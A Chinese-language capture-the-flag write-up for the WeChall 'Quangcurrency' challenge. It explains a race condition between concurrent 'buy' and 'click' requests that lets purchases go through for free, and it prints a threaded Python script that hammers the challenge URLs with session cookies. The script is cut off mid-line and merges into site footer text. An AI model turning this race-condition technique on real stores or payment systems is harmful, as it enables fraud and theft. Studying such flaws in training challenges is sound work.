这一题的意思就是 让你用有限的钱买更多的东西。
其实一个很坑的地方就是:这题的名字Quangcurrency念出来就是concurrency。So,懂了没?
首先,Buy的时候,金钱应该减1000.
然而,在我们Click的时候,会在原有的钱数上+1.
这就带来了一个问题:
这Click的+1是加在原有的钱上面还是在Buy之后的钱上?
若是在Buy之前的钱上,那么就相当于免费买了一个Item。
所以,我们就可以利用这个漏洞,同时进行Buy和Click操作。这样就有一定几率能够免费消费。写个脚本挂一会就可以
通过了。
以下是我的Python脚本:
import requests;
import threading;
import re;
def f1():
requests.get('http://www.wechall.net/challenge/quangcurrency/buy.php',cookies=wc);
def f2():
requests.get('http://www.wechall.net/challenge/quangcurrency/click.php',cookies=wc);
def f3():
r=requests.get('http://www.wechall.net/challenge/quangcurrency/stats.php',cookies=wc).text;
a=m.findall(r);
print(a[0][0]+' '+a[0][1]+' '+a[0][2]);
if(int(a[0][1])>50):
f4();
if(int(a[0][0])FROM :rickyhao.com | rickyhao.com
相关推荐: Flare-on Challenge 2017 部分题解
Flare-on Challenge 2017 部分题解 Last updated:Oct.22, 2017 CST 18:38:42 Flare-on Challenge 2017 部分题解 ROT13 Igniteme Greektome Notepad …
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论